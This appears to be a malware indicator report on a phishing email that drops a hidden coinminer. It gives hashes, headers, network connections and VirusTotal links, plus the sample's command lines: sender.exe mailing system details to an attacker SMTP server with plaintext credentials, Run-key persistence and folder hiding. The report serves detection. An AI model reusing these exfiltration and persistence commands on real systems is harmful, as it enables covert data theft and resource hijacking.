#IOC #OptiData #VR #coinminer #bmcon #SCR
https://pastebin.com/ELpZTc1y

attack_vector
--------------
email attach > SCR > C:\Intel\*
email_headers
--------------
Received: from [10.10.18.73] (helo=frv73.fwdcdn.com) by frv53.fwdcdn.com;
Received: from mx-out-10.default-host.net ([185.104.44.45]) by frv73.fwdcdn.com
Received: from [10.109.98.35] (unknown [46.148.20.31]) by mx-out-10.default-host.net
From: Вiкторiя Коваль <mail@pilontravel.com>
To: <user0@victim.com>
Subject: Добрий день
Date: Mon, 25 Feb 2019 07:27:41 +0200
files
--------------
SHA-256   5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c
File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, v69]
File size 735.93 KB

SHA-256   de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65
File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 793.76 KB

SHA-256   40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name bmcon.exe
File size 354.5 KB

SHA-256   f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04
File name private.exe
File size 292.87 KB

SHA-256   1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
File name sender.exe
File size 220 KB

SHA-256   1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46
File name bmstart.exe
File size 349.5 KB

SHA-256   25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8
File name bm-xmrig.exe
File size 467.5 KB
activity
**************
SEND SMTP_587
--------------
220 vserver321.axc.nl ESMTP Exim 4.91 Mon, 25 Feb 2019 12:16:42 +0100
EHLO victim
250-vserver321.axc.nl Hello victim [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@8680541.store>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Mon, 25 Feb 2019 13:16:12 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@8680541.store
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4ccfb$Blat.v3.0.7$841b4e9f$6e43fb7980@download-files.site>
Subject: victim-PC/User-admin
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
	charset="UTF-8"

OS-Windows7 x64/CPU
PU-...................... VGA ...................... ..............
.
250 OK id=1gyEFX-00CvKe-IH
QUIT
221 vserver321.axc.nl closing connection
netwrk
--------------
http.request.method == GET
91.223.19.233  isrg.trustid.ocsp.identrust.com  GET /MFEwTzBNMEswSTAJB... HTTP/1.1  Microsoft-CryptoAPI/6.1
91.223.19.242  ocsp.int-x3.letsencrypt.org      GET /MFMwUTBPME0wSzAJB... HTTP/1.1  Microsoft-CryptoAPI/6.1
205.185.216.42 ctldl.windowsupdate.com          GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?ef2a83e4926beeac HTTP/1.1  Microsoft-CryptoAPI/6.1
ssl
88.99.38.225   dl.browsermine.com               Client Hello
comp
--------------
bmcon.exe     3048 TCP localhost 49231 88.99.38.225   443  ESTABLISHED
bmcon.exe     3048 TCP localhost 49232 91.223.19.233  80   ESTABLISHED
bmcon.exe     3048 TCP localhost 49233 91.223.19.242  80   ESTABLISHED
bm-xmrig.exe  3000 TCP localhost 49236 159.69.189.115 4444 ESTABLISHED
svchost.exe   244  TCP localhost 49237 205.185.216.42 80   ESTABLISHED
proc
--------------
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe /c ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -h off
C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe +s +h C:\Intel\bmcon
C:\Windows\SysWOW64\cmd.exe /c ver
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
C:\Windows\SysWOW64\Wbem\WMIC.exe CPU Get Name /Value
C:\Windows\SysWOW64\cmd.exe /c /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
C:\Windows\SysWOW64\Wbem\WMIC.exe /Node:localhost Path Win32_VideoController Get Name /Value
C:\Intel\sender.exe -to recipient@8680541.store -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU..."
C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
C:\Windows\SysWOW64\PING.EXE -n 300 127.0.0.1
C:\Intel\bmcon.exe
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
C:\Intel\bmcon\bm-xmrig.exe
persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.02.2019 13:16
#1 BMCon
c:\intel\bmcon.exe 03.11.2018 2:42
#2 private
17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
c:\intel\private.exe 20.06.1992 0:22
drop
--------------
C:\Intel\bmcon.exe
C:\Intel\bmcon.json
C:\Intel\GfxUI.exe.config
C:\Intel\IGFXDEVLib.dll
C:\Intel\iglhxa32.vp
C:\Intel\Impcd.cat
C:\Intel\IntcDAuC.dll
C:\Intel\mup.xml
C:\Intel\private.exe
C:\Intel\readme-VGA.txt
C:\Intel\sender.exe
C:\Intel\Setup2.if2
C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json
C:\Intel\bmcon\bm-xmrig-amd.exe
C:\Intel\bmcon\bm-xmrig-amd.json
C:\Intel\bmcon\bm-xmrig-nvidia.exe
C:\Intel\bmcon\bm-xmrig-nvidia.json
C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
C:\Intel\bmcon\bm-xmrig-x32.exe
# # #
https://www.virustotal.com/#/file/5f4f4063cd0fbc81d6c3c27faddda1dfb141afdc0b2f570b4a50184b9c54f36c/details
https://www.virustotal.com/#/file/de27c7d0366b0171ce8d913e8749aac3d17e0c0ddf58b69ca5722510f006df65/details
https://analyze.intezer.com/#/analyses/b8d83fe5-1420-48e5-a64d-a7fa8b858cf8
https://www.virustotal.com/#/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/#/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
https://www.virustotal.com/#/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
https://www.virustotal.com/#/file/1fd1d4bc4f013d8b4f9add82dfcaa507f771e2261d31b063fa96366c91dcdd46/details
https://www.virustotal.com/#/file/25b54ffbe7427a7ee0113519785266d9aea4b92fe7c4e2e0fcc5852dbc6561f8/details
https://analyze.intezer.com/#/analyses/8b737361-aa0c-42b0-99ce-fe8ae2fe8742

VR @